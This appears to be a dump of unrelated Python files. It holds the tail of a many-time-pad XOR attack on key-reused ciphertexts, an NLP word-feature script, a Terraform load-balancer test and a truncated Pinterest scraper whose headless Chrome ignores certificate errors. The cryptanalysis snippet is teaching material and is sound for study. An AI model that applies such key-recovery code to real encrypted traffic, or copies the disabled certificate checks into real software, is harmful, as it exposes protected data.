return '_'
target_len = len(target)
# Truncate each ciphertext to the same length as the target
cts = [x[:target_len] for x in cts]
# Inspect the XOR of each pair of ciphertexts
for i in range(0, len(cts)):
for j in range(0, len(cts)):
if i != j:
list_xor = [show_ascii(c) for c in split_byte(hex_xor(cts[i], cts[j]))]
print('[c{} xor c{}]: {}'.format(i, j, ''.join(list_xor)))
print()
# Inspect the XOR of each ciphertext with the target
for i in range(len(cts)):
list_xor = [show_ascii(c) for c in split_byte(hex_xor(cts[i], target))]
print('[c{} xor cx]: {}'.format(i, ''.join(list_xor)))
# result = "The secret message is: When using a stream cipher, never use the key more than once"
|
StarcoderdataPython
|
3255722
|
<filename>src/code/db/analytics/index_feat.py
#!/usr/bin/env python
from collections import OrderedDict
from json import dump
from nltk import pos_tag
from nltk.corpus import stopwords
from context import *
from settings.filemgmt import fileManager
from settings.paths import ADJECTIVES, BOW, CURSE_RAW, CURSES, NOUNS, \
STOPWORDS, SYLLABLES, VERBS
bagOfWords = fileManager(BOW, 'r').split(',')
def bagOfCurse():
curseFile = fileManager(CURSE_RAW, 'r')
return filter(
None, [word.partition(':')[0].strip()
for word in curseFile.split()[1:-1]
if len(word) > 3 and any(char.isdigit() for char in word)]
)
def bagOfStopWords():
stopWords = [str(word) for word in stopwords.words('english')]
stopWords.extend(
[
word for word in bagOfWords if word.isdigit() or len(word) < 2
]
)
return stopWords
def bagOfPOS():
pos = pos_tag(bagOfWords)
adj = [word[0] for word in pos if 'JJ' in word[-1]]
nouns = [word[0] for word in pos if 'NN' in word[-1]]
verbs = [word[0] for word in pos if 'VB' in word[-1]]
return adj, nouns, verbs
def countSyllables(word):
vowels = 'aeiouy'
numVowels = 0
lastWasVowel = False
for wc in word:
foundVowel = False
for v in vowels:
if v == wc:
if not lastWasVowel:
numVowels += 1 # don't count diphthongs
foundVowel = lastWasVowel = True
break
# If full cycle and no vowel found, set lastWasVowel to false
if not foundVowel:
lastWasVowel = False
if (len(word) > 2 and word[-2:] == 'es') or \
(len(word) > 1 and word[-1:] == 'e'):
numVowels -= 1
return numVowels
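# Illustrative values under this heuristic (count vowel groups, then subtract
# a trailing silent 'e'/'es'): countSyllables('python') -> 2,
# countSyllables('analysis') -> 4, countSyllables('made') -> 1.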
def bagOfSyllables():
success = {}
for word in bagOfWords:
success[word] = countSyllables(word)
return success
def convertToDict(featList):
return OrderedDict(sorted(intersectLists(featList).items()))
def intersectLists(bagOfFeats):
feat = set(bagOfFeats)
intersects = list(feat & set(bagOfWords))
return {
intersectWord: (bagOfWords.index(intersectWord) + 1)
for intersectWord in intersects
}
def dumpJSON(newFeats, path):
with open(path, 'w') as outputJSON:
dump(newFeats, outputJSON)
if __name__ == '__main__':
curses = bagOfCurse()
curses = convertToDict(curses)
dumpJSON(curses, CURSES)
syllables = bagOfSyllables()
dumpJSON(syllables, SYLLABLES)
stopWords = bagOfStopWords()
stopWords = convertToDict(stopWords)
dumpJSON(stopWords, STOPWORDS)
adj, nouns, verbs = bagOfPOS()
adj = convertToDict(adj)
nouns = convertToDict(nouns)
verbs = convertToDict(verbs)
dumpJSON(adj, ADJECTIVES)
dumpJSON(nouns, NOUNS)
dumpJSON(verbs, VERBS)
|
StarcoderdataPython
|
66406
|
# Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import pytest
FIXTURES_DIR = os.path.join(os.path.dirname(__file__), 'fixture')
_BACKENDS = '[{balancing_mode="CONNECTION", group="foo", failover=false}]'
def test_defaults(plan_runner):
"Test variable defaults."
_, resources = plan_runner(FIXTURES_DIR, backends=_BACKENDS)
assert len(resources) == 3
resources = dict((r['type'], r['values']) for r in resources)
fwd_rule = resources['google_compute_forwarding_rule']
assert fwd_rule['load_balancing_scheme'] == 'INTERNAL'
assert fwd_rule['all_ports']
assert fwd_rule['allow_global_access'] is None
backend = resources['google_compute_region_backend_service']
assert len(backend['backend']) == 1
assert backend['backend'][0]['group'] == 'foo'
health_check = resources['google_compute_health_check']
for k, v in health_check.items():
if k == 'http_health_check':
assert len(v) == 1
assert v[0]['port_specification'] == 'USE_SERVING_PORT'
elif k.endswith('_health_check'):
assert len(v) == 0
def test_forwarding_rule(plan_runner):
"Test forwarding rule variables."
_, resources = plan_runner(
FIXTURES_DIR, backends=_BACKENDS, global_access='true', ports="[80]")
assert len(resources) == 3
values = [r['values'] for r in resources if r['type']
== 'google_compute_forwarding_rule'][0]
assert not values['all_ports']
assert values['ports'] == ['80']
assert values['allow_global_access']
|
StarcoderdataPython
|
3284424
|
<reponame>BlairMar/Pintrest-webscraping-project
from typing import Union, List, Set
from pandas.core.frame import DataFrame
from selenium import webdriver
from time import sleep
import urllib.request
import os
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.common.by import By
from selenium.webdriver.support import expected_conditions as EC
import json
from sqlalchemy.engine.base import Engine
# from webdriver_manager.chrome import ChromeDriverManager
import boto3
from tqdm import tqdm
import shutil
import uuid
import re
import pandas as pd
from sqlalchemy import create_engine
import sys
from selenium.webdriver.chrome.options import Options
''' Defines a class to perform web scraping for the Pinterest website. '''
class PinterestScraper:
def __init__(self, root: str) -> None:
''' Initialise the attributes of the class
Arguments
---------
root: str (The main page which contains a list of all the available categories.)
Attributes
---------
category: str \n
root: str \n
driver: webdriver object \n
link_set: set \n
log: set \n
s3_list: list \n
current_dict: dict \n
main_dict: dict \n
counter_dict: dict \n
cat_imgs_to_save: dict \n
s3_client: boto3.client(s3) \n
xpath_dict: dict \n
Returns
---------
None '''
self._category = None # Holds the value whatever category we are currently on.
self._root = root # The root URL.
chrome_options = Options()
chrome_options.add_argument('--ignore-certificate-errors')
chrome_options.add_argument('--allow-running-insecure-content')
chrome_options.add_argument('--no-sandbox')
chrome_options.add_argument('--headless')
chrome_options.add_argument('--disable-dev-shm-usage')
self._driver = webdriver.Chrome(options=chrome_options)
# self._driver = webdriver.Chrome(ChromeDriverManager().install())
self._link_set = set() # A set to store previously visited pages' hrefs.
self._log = set() # A set used to load previously visisted pages' hrefs upon a rerun.
self._s3_list = [] # A list used to store the names of categories which are to be saved to an s3 bucket.
self._current_dict = {} # A dictionary to store data for each individual image page.
self._main_dict = {} # A dictionary to store data for entire categories.
self._counter_dict = {} # A dictionary to define the start point for each category on subsequent runs.
self._cat_imgs_to_save = {} # A dictionary which store which categories to download images for on a given run.
self._s3_client = boto3.client('s3') # S3 client to connect to AWS S3.
self._xpath_dict = { # A dictionary to store xpaths to various page elements.
'official_user_container': '//div[@data-test-id="official-user-attribution"]',
'official_user_element': './/div[@class="tBJ dyH iFc yTZ pBj zDA IZT mWe CKL"]',
'non_off_user_container': '//div[@data-test-id="user-rep"]',
'non_off_user_element': './/div[@class="tBJ dyH iFc yTZ pBj zDA IZT mWe"]',
'follower_element': './/div[@class="tBJ dyH iFc yTZ pBj zDA IZT swG"]',
'tag_container': '//div[@data-test-id="CloseupDetails"]',
'story_tag_container': '//div[@data-test-id="CloseupMainPin"]',
'tag_vase_carousel': '//div[@data-test-id="vase-carousel"]',
'tag_link': './/div[@data-test-id="vase-tag"]//a',
'reg_title_element': '//div[@data-test-id="CloseupDetails"]//div[@data-test-id="pinTitle"]/h1/div',
'h1_title_element': '//div[@data-test-id="CloseupMainPin"]//h1',
'desc_container': '//div[@data-test-id="CloseupDetails"]//div[@data-test-id="CloseupDescriptionContainer"]',
'desc_element': './/span[@class="tBJ dyH iFc yTZ pBj zDA IZT swG"]',
'links_container': '//div[@data-test-id="grid"]//div[@class="vbI XiG"]',
'links_element': './/div[@class="Yl- MIw Hb7"]/div/div/div/div[1]/a',
'categories_container': '//div[@data-test-id="interestRepContainer"]',
'pin_closeup_image': '//div[@data-test-id="pin-closeup-image"]//img',
'story_pin_image': '//div[@aria-label="Story Pin image"]',
'story_pin_video': '//div[@data-test-id="story-pin-closeup"]//video',
'story_pin_multi_video': '//div[@data-test-id="story-pin-closeup"]//video',
'close_up_details': '//div[@data-test-id="CloseupDetails"]'
}
self._driver.get(self._root) # Opens the root URL.
self._argsv = sys.argv
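# The class drives all of its prompts from positional command-line arguments
# rather than interactive input. A sketch of the positions consumed by the
# self._argsv lookups later in this file (other positions may be used
# elsewhere in the project):
#   argv[1]  number of categories to scrape
#   argv[2]  comma-separated category choices
#   argv[3]  download any images? (Y/N)
#   argv[4]  categories to download images for ('A' or comma-separated indices)
#   argv[5]  upload to an S3 bucket? (Y/N)
#   argv[6]  S3 bucket name
#   argv[7]  confirm the bucket name (Y/N)
#   argv[8]  categories to upload ('A' or comma-separated indices)
#   argv[9]  append to previously saved data? (Y/N)
#   argv[11] create/update an RDS? (Y/N)
#   argv[12] remote (AWS) RDS rather than local? (Y/N)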
def _get_category_links(self, categories_xpath: str) -> dict:
''' Defines a function which extracts the href attribute
of each category on the root URL page.
Arguments
---------
categories_xpath: str (The xpath to the web element containing the container for the category page links.)
Returns
---------
dict (A dictionary containing the href for each category.) '''
# Get the a list of all the categories on the root.
try:
# Wait until the presence of desired element is located or 2 seconds pass.
container = WebDriverWait(self._driver, 2).until(
EC.presence_of_element_located((By.XPATH, categories_xpath))
)
categories = container.find_elements_by_xpath('.//a')
# Extract the href.
return {i+1:link.get_attribute('href') for i, link in enumerate(categories)}
except KeyboardInterrupt:
raise KeyboardInterrupt
def _print_options(self, category_link_dict: dict) -> None:
''' Defines a function which prints all of the available categories
on the root URL page.
Arguments
---------
category_link_dict: dict (A dictionary containing the hrefs to each category presented on the root page.)
Returns
---------
None '''
try:
print(f"\n The options (Total {len(category_link_dict)}) are:")
# Print all categories available on the root page.
for idx, category in category_link_dict.items():
print(f"\t {idx}: {category.replace(self._root, '').split('/')[0]}")
except KeyboardInterrupt:
raise KeyboardInterrupt
def _categories_to_save_imgs(self, selected_category_names: list) -> None:
''' Defines a function which asks the user which categories they would like to download images for.
Each category is then recorded in cat_imgs_to_save as True (images will be downloaded) or False
(images will not be downloaded).
Arguments
---------
selected_category_names: list (A list of all categories selected by the user for the current run.)
Returns
---------
None'''
try:
# Ask the user if they would like to download any images at all.
get_any = ''
while get_any != 'N' and get_any != 'Y':
get_any = self._argsv[3].upper()
# If yes, ask them which categories they would like to download images for.
if get_any == 'Y':
# Create the start of an input check list to ensure correct input is obtained.
print('A = All categories: ')
download_check = ['A']
# Add an option for each category that has been selected to grab data for.
for index, category in enumerate(selected_category_names):
print(f'{index + 1} = {category}')
download_check.append(str(index + 1))
while True:
# Ask which categories they would like to download images for.
try:
downloads = self._argsv[4].upper()
# Split the string input into a list of inputs.
downloads = (downloads.replace(' ', '')).split(',')
# Create an empty list to append inputs to, to ensure no repeated inputs.
repeat_check = []
for option in downloads:
# Append each input in to the repeat check list.
repeat_check.append(option)
# Ensure that the input is acceptable.
assert option in download_check
# Check that no repeats were in the user input.
assert len(repeat_check) == len(set(repeat_check))
# If the user wants to download all images.
if 'A' in downloads:
for cat_name in selected_category_names:
self._cat_imgs_to_save[cat_name] = True
else:
# If they don't want to download images for all categories.
for option in downloads:
self._cat_imgs_to_save[selected_category_names[int(option) - 1]] = True
# Ensure dictionary is update even for categories the user doesn't want to download.
for name in selected_category_names:
if name not in self._cat_imgs_to_save.keys():
self._cat_imgs_to_save[name] = False
# Print what the user has chosen to download images for (if any).
print_list = [key for key, value in self._cat_imgs_to_save.items() if value == True]
print(f'\nDownloading images for {print_list}')
break
except KeyboardInterrupt:
raise KeyboardInterrupt
# If the user input did not fulfill the parameters set above.
except:
print('\nPlease only select options from the provided list. No duplicates. ')
# If they user does not want to download any images.
elif get_any == 'N':
print('\nNo images will be downloaded. ')
for cat_name in selected_category_names:
self._cat_imgs_to_save[cat_name] = False
# If they user did not choose Y or N.
else:
print('\nNot a supported input. Please retry: ')
except KeyboardInterrupt:
raise KeyboardInterrupt
def _get_user_input(self, category_link_dict: dict) -> tuple:
''' Defines a function which asks the user how many and which categories
to download.
Arguments
---------
category_link_dict: dict (A dictionary containing the hrefs to each category presented on the root page.)
Returns
---------
selected_category_names: list (A list of all categories selected by the user for the current run.) \n
selected_category: dict (A dictionary of the categories in the current run as values to indexed keys.) '''
# Ask the user how many of the printed categories they would like to grab data for.
try:
while True:
try:
categories_num = int(self._argsv[1])
# Ensure a valid answer.
assert 0 < categories_num <= len(category_link_dict)
break
except KeyboardInterrupt:
raise KeyboardInterrupt
except:
print(f"\nInvalid input, try again.")
selected_category = {}
# If chosen number == max amount.
if categories_num == len(category_link_dict):
# Set empty dict to dict of full categories available for selection.
selected_category = category_link_dict
else:
try:
choices = []
# Create a list of numbers 1 through total number of categories available.
check_list = [str(x+1) for x in range(len(category_link_dict))]
# Have user select what categories they want data for if not all categories.
while len(choices) != categories_num:
choices = self._argsv[2]
# Turn user input into correct list format.
choices = (choices.replace(' ', '')).split(',')
# Print out the users choices.
print(choices)
# Check the validity of each input in the users list.
for choice in choices:
# If the input is not valid, restart the loop.
if choice not in check_list:
choices = []
print(f'\nPlease only enter integers in a comma separated \
list. Values between 1 and {len(category_link_dict)}: ')
break
# Ensure a choice is made.
if len(choices) == 0:
continue
# Ensure the number of choices match the number of categories user previously requested.
elif len(choices) != categories_num:
print('\nPlease only select the predetermined number of choices. ')
# Ensure that only unique inputs are allowed.
elif len(set(choices)) != len(choices):
print('\nOnly unique categories accepted. ')
choices = []
# If requirements are met, add the category name as the value to a Key of 1 -> number of selected categories.
elif len(set(choices)) == len(choices) == categories_num:
for i, choice in enumerate(choices):
choice = int(choice)
selected_category[i+1] = category_link_dict[choice]
else:
print('\nUnknown choice error')
except KeyboardInterrupt:
raise KeyboardInterrupt
except:
raise Exception(f"\nChoice error 2")
# Create a list of category names without the /*numberstring following the name.
selected_category_names = [category.split('/')[4] for category in selected_category.values()]
print(f"Categories selected: {selected_category_names}")
return selected_category_names, selected_category
except KeyboardInterrupt:
raise KeyboardInterrupt
def create_RDS(self) -> None:
''' Defines a function which asks the user if they would like to create an RDS.
If the user says yes, asks whether the RDS should be local or remote.
Arguments
---------
None
Returns
---------
None '''
try:
# Ask the user if they would like to create an RDS.
valid = False
while not valid:
rds_answer = self._argsv[11].upper()
if rds_answer == 'Y' or rds_answer == 'N':
# Answer is valid, stop the loop.
valid = True
if rds_answer == 'Y':
print('Creating RDS...')
# Ask whether to create/update tables on AWS RDS or local RDS.
remote_RDS = self._argsv[12].upper()
# Create/update remote RDS.
if remote_RDS == 'Y':
self._json_to_rds('../data/', True)
# Create/update local RDS.
elif remote_RDS == 'N':
self._json_to_rds('../data/', False)
else:
print('Invalid answer')
else:
print('Data will not be saved in an RDS...')
except KeyboardInterrupt:
raise KeyboardInterrupt
def _interior_cloud_save_loop(self, remote: str, selected_category_names: list) -> Union[None, str]:
''' Defines the interior loop of the overall cloud save function. The interior loop is designed and
integrated so that the first question of the full loop is only asked once if an error is made when
typing the name of the desired s3 bucket.
Arguments
---------
remote: str (Y or N or other user input from the exterior function '_save_to_cloud_or_local'.) \n
selected_category_names: list (A list of all categories selected by the user for the current run.)
Returns
---------
str ('retry' or '' depending on where the loop is broken to pass this back to the external function.) \n
None (If the loop is broken somewhere where a str is not returned.) '''
try:
# If user wants to save data to an S3 bucket, gets the name of the bucket.
if remote == 'Y':
self.s3_bucket = self._argsv[6]
# Shows the user the input to check that there are no mistakes in their entry. Asks to continue.
go_on = ''
while go_on != 'Y' and go_on != 'N':
go_on = self._argsv[7].upper()
# If they user is happy with their entry.
if go_on == 'Y':
# Creates a printed list and a check list for the user's next input.
print('A = All categories: ')
upload_check = ['A']
for index, category in enumerate(selected_category_names):
print(f'{index + 1} = {category}')
upload_check.append(str(index + 1))
while True:
try:
# Asks the user which categories they would like to upload to the S3 bucket.
all_or_some = self._argsv[8].upper()
# Turns the input into a valid list.
all_or_some = (all_or_some.replace(' ', '')).split(',')
# Shows the user their choices.
print(all_or_some)
# Creates an empty list to append to in order to check for repeat inputs from the user.
repeat_check = []
for option in all_or_some:
# Append each input in the user's list to the repeat check.
repeat_check.append(option)
# Ensure input is valid.
assert option in upload_check
# Ensure no repeats.
assert len(repeat_check) == len(set(repeat_check))
# If they user wants to upload everything to S3. Creates a list of all current run categories.
if 'A' in all_or_some:
self._s3_list = selected_category_names
# If the user only wants specific categories to be uploaded to S3.
else:
# Creates a list of selected categories.
for option in all_or_some:
self._s3_list.append(selected_category_names[int(option) - 1])
break
except KeyboardInterrupt:
raise KeyboardInterrupt
except:
print('\nPlease only select options from the provided list. No duplicates. ')
# If the user made a mistake when entering their bucket or wants to change bucket.
elif go_on == 'N':
print('\nPlease re-enter the name of your bucket. ')
# Returns to the exterior script a string which in turn will repeat the above code.
return 'retry'
# If the user doesn't want to upload anything to S3 move on with the script.
elif remote == 'N':
print('\nAll data will be stored on your local machine. ')
else:
print('\nYour selection was not valid, please choose again. ')
return ''
except KeyboardInterrupt:
raise KeyboardInterrupt
def _save_to_cloud_or_local(self, selected_category_names: list) -> None:
''' Defines a function which asks if the user wants to upload any data/images to an S3 bucket.
Arguments
---------
selected_category_names: list (A list of all categories selected by the user for the current run.)
Returns
---------
None '''
try:
remote = ''
# Asks if the user wants to upload anything to S3.
while remote != 'N' and remote != 'Y':
# If this is the first time running the function, or they made an inccorect entry last time.
if remote == '':
remote = self._argsv[5].upper()
# Go to the interior loop.
remote = self._interior_cloud_save_loop(remote, selected_category_names)
# If the interior loop was completed successfully.
if remote == None:
break
# If the user made a mistake in entering the name of their bucket.
elif remote == 'retry':
remote = 'Y'
# Go back to the interior loop without repeating the first part of this function.
remote = self._interior_cloud_save_loop(remote, selected_category_names)
# If the interior loop was completed successfully.
if remote == None:
break
else:
print('\nLoop structure error. Luke you stupid...')
except KeyboardInterrupt:
raise KeyboardInterrupt
def _initialise_local_folders(self, directory_path: str, selected_category_names: list) -> None:
''' Defines a function which initialises folders for local saves.
Arguments
---------
directory_path: str (A str indicating the location of the folder containing the src folder this file runs from.) \n
selected_category_names: list (A list of all categories selected by the user for the current run.)
Returns
---------
None '''
try:
# Assign the directory path to attribute for later use.
self._root_save_path = directory_path
print(f"\nCreating folders. ")
for category in selected_category_names:
# Creates a folder named data to store a folder for each category
if not os.path.exists(f'{self._root_save_path}'):
os.makedirs(f'{self._root_save_path}')
# Initialises a key with an empty dictionary value for each category in the current run for the main dictionary.
self._main_dict[f"{category}"] = {}
# Makes a temporary storage folder for every category in the current run.
os.makedirs(f'{self._root_save_path}/temp_{category}')
except KeyboardInterrupt:
raise KeyboardInterrupt
def _initialise_counter(self, selected_category_names: list) -> dict:
''' Defines a function which initialises the counter dictionary.
Arguments
---------
selected_category_names: list (A list of all categories selected by the user for the current run.)
Returns
---------
dict (The counter dictionary this function initialises.) '''
try:
# Initialises the count for each category in current run.
for category in selected_category_names:
self._counter_dict[f'{category}'] = 0
return self._counter_dict
except KeyboardInterrupt:
raise KeyboardInterrupt
def _check_for_logs(self, selected_category_names: list) -> Union[str, None]:
''' Defines a function which checks for data relating to a previous run of this script.
If the logs are found, use these to initialise the scraper dictionaries if the current
categories relate at all to the previous save data.
Arguments
---------
selected_category_names: list (A list of all categories selected by the user for the current run.)
Returns
---------
fresh: Union[str, None] ('Y' or 'N' if previous save data is detected and the user chooses so. \
None if no data relates to current run.) '''
try:
# If there is has been a previous run and the logs are still on the system.
if os.path.exists('../data/recent-save-log.json'):
# Loads the log regarding location of save data.
with open('../data/recent-save-log.json', 'r') as load:
recent_saves = json.load(load)
# Gets the categories relating to the current run from the save data.
saves = [key for key in recent_saves if key in selected_category_names]
# Loads the log regarding web pages already visited as to not repeat data collection.
with open('../data/log.json', 'r') as load:
contents = json.load(load)
# Save data in log is saved as the href collected and the related category.
tuples_content = [(item[0], item[1]) for item in contents]
# If any data relates to current run print which categories they are.
if saves:
print(f'\nWe have detected saved data for the follow categories: {saves}. ')
fresh = ''
# Asks the user if they would like to append to existing data to start afresh.
while fresh != 'Y' and fresh != 'N':
fresh = self._argsv[9].upper()
# If user wants to append, update link set and log with the hrefs previously visited.
if fresh == 'Y':
self._link_set = set(tuples_content)
self._log = set(tuples_content)
# Increase the counter dictionary for each category to the correct starting point.
for cat, href in tuples_content:
category = cat.split('/')[0]
if category in selected_category_names:
self._counter_dict[category] += 1
for save in saves:
# If a category has a local save file, load the associated json data into the main dictionary.
if recent_saves[save] == 'local':
with open(f'../data/{save}/{save}.json', 'r') as load:
self._main_dict[f'{save}'] = json.load(load)
# If a category has a remote save file, load the associated json data into the main dictionary.
elif recent_saves[save][0] == 'remote':
obj = self._s3_client.get_object(
Bucket = recent_saves[save][1],
Key = (f'pinterest/{save}/{save}.json')
)
self._main_dict[f'{save}'] = json.loads(obj['Body'].read())
else:
print('\nSomething fishy going on with the save_log. ')
# If the user wants to start anew for current run categories, ensure data for categories not in this run
# remains intact while removing data relating to current run categories.
elif fresh == 'N':
tuples_content = [item for item in tuples_content if item[0].split('/')[0] not in saves]
self._link_set = set(tuples_content)
self._log = set(tuples_content)
else:
print('\nPlease re-enter your input. ')
# If there is save data but none relates to current run categories, ensure data is maintained.
else:
self._link_set = set(tuples_content)
self._log = set(tuples_content)
fresh = None
print("\nPrevious saves detected: None relate to this data collection run. ")
# If no previous save data was found.
else:
fresh = None
return fresh
except KeyboardInterrupt:
raise KeyboardInterrupt
def _extract_links(self, container_xpath: str, elements_xpath: str, n_scrolls: int = 1) -> None:
''' Defines a function which scrolls through the page relating to every category in the current run.
With each scroll it grabs the href of each image page that it finds and appends it to a set of hrefs.
Arguments
---------
container_xpath: str (The xpath for the web element which contains all the images on the page being scraped.) \n
elements_xpath: str (The xpath regarding the <a> tags which contain the hrefs the method gaathers.) \n
n_scrolls: int (The number of times a user wishes to scroll down each category page.)
Returns
---------
None '''
try:
# Opens the page for a category.
self._driver.get(self._root + self._category)
# Sets the maximum amount of pixels allowed for one scroll.
Y = 10**6
sleep(2)
# Keep scrolling down the specified number of times.
for _ in range(n_scrolls):
# Scrolls down the page.
self._driver.execute_script(f"window.scrollTo(0, {Y})")
sleep(1)
try:
# Stores the href to each image page if the page contains the desired images.
container = self._driver.find_element_by_xpath(container_xpath)
link_list = container.find_elements_by_xpath(elements_xpath)
# Displays the images grabbed in a specific scroll.
print(f"\nNumber of images successfully extracted: {len(link_list)}")
# Appends the hrefs to a set.
self._link_set.update([(self._category, link.get_attribute('href')) for link in link_list])
# Displays the total number of unique hrefs after every scroll.
print(f"\nNumber of images unique to this run: {len(self._link_set) - len(self._log)}")
except:
# If the page contains no images, or there is an error loading image elements on a page, skip the category.
print('\nNo images detected on this page. Moving to next page (if applicable). ')
# Leaves a message in the dictionary to explain why there is no data.
self._main_dict[self._category.split('/')[0]]['Message'] = 'No image data available for this category on this run. \
\nThere may not be any images on this page or there may have been an error.'
break
except KeyboardInterrupt:
raise KeyboardInterrupt
def _grab_images_src(self, selected_category: dict, n_scrolls: int = 1) -> None:
''' Defines a function which grabs all the hrefs for all the images to be grabbed during the run.
Arguments
---------
selected_category: dict (A dictionary of the categories in the current run as values to indexed keys.) \n
n_scrolls: int (The number of times a user wishes to scroll down each category page.)
Returns
---------
None '''
try:
# Loops through each category and runs extract_links to grab hrefs.
for category in selected_category.values():
self._category = category.replace(self._root, "")
self._extract_links(self._xpath_dict['links_container'],
self._xpath_dict['links_element'],
n_scrolls)
except KeyboardInterrupt:
raise KeyboardInterrupt
def _generate_unique_id(self) -> None:
''' Defines a function which generates a unique ID (uuid4) for every image page
that is scraped by the scraper.
Arguments
---------
None
Returns
---------
None '''
try:
# Generates a uuid4.
self._current_dict['unique_id'] = str(uuid.uuid4())
except KeyboardInterrupt:
raise KeyboardInterrupt
def _grab_title(self, title_element: str) -> None:
''' Defines a function that grabs the title from a Pinterest page and adds it to the key
"title" in self._current_dict.
Arguments
---------
title_element: str (The xpath that leads to the title web element of a given Pinterest page.)
Returns
---------
None '''
try:
# Finds the title web element of a page and assigns it to the dictionary of the current page data.
try:
title_element = self._driver.find_element_by_xpath(title_element)
self._current_dict["title"] = title_element.get_attribute('textContent')
# No title element found.
except:
self._current_dict["title"] = 'No Title Data Available'
except KeyboardInterrupt:
raise KeyboardInterrupt
def _grab_description(self, desc_container, desc_element) -> None:
''' Defines a function that grabs the description from a Pinterest page and adds it to the key
"description" in self._current_dict.
Arguments
---------
desc_container: str (The xpath for the web element which contains the description section of the page.) \n
desc_element: str (The xpath that leads to the description web element following the container xpath.)
Returns
---------
None '''
try:
# Grabs the container of the description box.
description_container = self._driver.find_element_by_xpath(desc_container)
# Tries to grab the description if it is present. If not, no description available.
try:
description_element = WebDriverWait(description_container, 0.5).until(
EC.presence_of_element_located((By.XPATH, desc_element))
)
self._current_dict["description"] = description_element.get_attribute('textContent')
# No description available.
except:
self._current_dict["description"] = 'No description available'
except KeyboardInterrupt:
raise KeyboardInterrupt
def _grab_user_and_count(self, dict_container, dict_element) -> None:
''' Defines a function that grabs the poster name and follower count and adds them to the keys
"poster_name" and "follower_count" respectively in self._current_dict.
Arguments
---------
dict_container: str (The xpath for the web element which contains the user information section of the page.) \n
dict_element: str (The xpath that leads to the poster name web element following the container xpath.)
Returns
---------
None '''
try:
try:
# Grabs the poster name and assigns to current dict.
container = self._driver.find_element_by_xpath(dict_container)
poster_element = container.find_element_by_xpath(dict_element)
self._current_dict["poster_name"] = poster_element.get_attribute('textContent')
# Grabs the follower count and assigns to current dict.
follower_element = container.find_elements_by_xpath(self._xpath_dict['follower_element'])
followers = follower_element[-1].get_attribute('textContent')
# If the element has no associated text, there are no followers.
if followers == '':
self._current_dict["follower_count"] = '0'
# Splits the text to only give the number of followers.
else:
self._current_dict["follower_count"] = followers.split()[0]
# If there is an error with the container for the user info, update the current dict accordingly.
except:
if 'poster_name' not in self._current_dict.keys():
self._current_dict['poster_name'] = 'User Info Error'
if 'follower_count' not in self._current_dict.keys():
self._current_dict['follower_count'] = 'User Info Error'
print('User Info Error')
except KeyboardInterrupt:
raise KeyboardInterrupt
def _grab_tags(self, tag_container) -> None:
''' Defines a function that grabs the tags from a Pinterest page and adds them to the key
"tag_list" in self._current_dict.
Arguments
---------
tag_container: str (The xpath for the web element which contains the tags for the page.)
Returns
---------
None '''
try:
try:
# Waits for the tag container element to appear on the page.
container = WebDriverWait(self._driver, 0.5).until(
EC.presence_of_element_located((By.XPATH, f'{tag_container}{self._xpath_dict["tag_vase_carousel"]}'))
)
# Grabs the text content of each tag on the page.
tag_elements = container.find_elements_by_xpath(self._xpath_dict['tag_link'])
self._current_dict["tag_list"] = [tag.get_attribute('textContent') for tag in tag_elements]
# If no tags are available on the page.
except:
self._current_dict["tag_list"] = 'No Tags Available'
except KeyboardInterrupt:
raise KeyboardInterrupt
def _download_image(self, src: str) -> None:
''' Defines a function that downloads the image on a page to the temp folder for its respective category.
Arguments
---------
src: str (The src link for the picture being downloaded.)
Returns
---------
None '''
try:
# If the category is one for which the user previously decided they wanted to download images for.
if self._cat_imgs_to_save[self._category]:
# Downloads the image to the appropriate folder.
urllib.request.urlretrieve(src,
f"{self._root_save_path}/temp_{self._category}/{self._category}_{self._counter_dict[self._category]}.jpg")
# If the image is not downloaded enter as such in current dict.
else:
self._current_dict['downloaded'] = False
except KeyboardInterrupt:
raise KeyboardInterrupt
def _is_img_downloaded(self) -> None:
''' Defines a function that appends whether the image has been downloaded or not to the current dict.
Arguments
---------
None
Returns
---------
None '''
try:
# If there is not a key 'downloaded' from the _download_image method then the image has been downloaded.
if 'downloaded' not in self._current_dict.keys():
# Append information as such to the current page dict.
self._current_dict['downloaded'] = True
# If downloaded already exists, image has not been downloaded and has previously been noted as such, so pass.
else:
pass
except KeyboardInterrupt:
raise KeyboardInterrupt
def _save_location_key(self) -> None:
''' Defines a function that appends the save location of a category's json file and potential images.
Arguments
---------
None
Returns
---------
None '''
try:
# If the category is to be saved remotely.
if self._category in self._s3_list:
# Append the bucket it will be saved to to the current dict.
self._current_dict['save_location'] = f"S3 bucket: {self.s3_bucket}"
else:
# Else appends a local save.
self._current_dict['save_location'] = f"Local save in /data/{self._category}"
except KeyboardInterrupt:
raise KeyboardInterrupt
def _grab_image_src(self) -> None:
''' Defines a function that grabs the image src from a Pinterest page and adds it to the key
"image_src" in self._current_dict.
Arguments
---------
None
Returns
---------
None '''
try:
try:
try:
# Waits for element to load as page layout can be determined by what elements load or not.
image_element = WebDriverWait(self._driver, 1).until(
EC.presence_of_element_located((By.XPATH, self._xpath_dict['pin_closeup_image']))
)
self._current_dict["is_image_or_video"] = 'image'
# If the element loads grab the image src.
self._current_dict["image_src"] = image_element.get_attribute('src')
# Download the image if user wants images downloaded for this category.
self._download_image(self._current_dict["image_src"])
# Appends if image has been downloaded or not to the current dict.
self._is_img_downloaded()
# Appends the save location of the image to the current dict.
self._save_location_key()
except:
# If the element didn't load it means that the element is a video and not an image.
video_element = self._driver.find_element_by_xpath('//video')
self._current_dict["is_image_or_video"] = 'video'
# Grab a different web element specifically for videos.
self._current_dict["image_src"] = video_element.get_attribute('poster')
# Download the thumbnail of the video if the user wants images downloaded for this category.
self._download_image(self._current_dict["image_src"])
# Appends if thumbnail has been downloaded or not to the current dict.
self._is_img_downloaded()
# Appends the save location of the thumbnail to the current dict.
self._save_location_key()
except:
# If the nested try block fails, the page has a layout that we have not encountered before, hence the failure.
self._current_dict['downloaded'] = False
self._save_location_key()
print('\nImage grab Error. Possible embedded video (youtube).')
except KeyboardInterrupt:
raise KeyboardInterrupt
def _grab_story_image_srcs(self) -> None:
''' Defines a function that grabs the image src from a Pinterest page that deviates from the usual
